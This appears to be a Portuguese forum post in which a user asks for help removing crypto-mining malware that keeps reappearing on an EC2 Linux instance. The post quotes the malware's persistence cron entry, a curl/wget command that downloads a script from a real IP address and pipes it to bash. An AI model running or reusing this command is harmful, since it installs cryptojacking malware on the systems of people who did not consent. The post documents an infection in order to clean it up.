Nos últimos dias, percebi que os aplicativos em execução na minha instância EC2 Linux estão muito lentos. A execução top
do comando me mostrou que existe um processo /var/tmp/sustse
que usa a maior parte da CPU.
Eu matei esse processo. No entanto, após reiniciar a instância, ela começou a funcionar novamente e a utilizar a maior parte da CPU. Ele também está criando entradas cron para o seguinte script:
*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
Pesquisei no Google e descobri que se trata de um malware de mineração de criptografia. Eu removi seus vestígios de/var/tmp/e removeu as entradas no Crontab. no entanto, essas entradas no Crontab parecem estar voltando de algum lugar e não consegui rastrear a localização exata do script que está fazendo essas entradas.
Também limpei as entradas /var/spool/cron*.
Não encontrei muita informação online para corrigir esse problema. Qualquer ajuda aqui seria muito apreciada.
Desde já, obrigado!!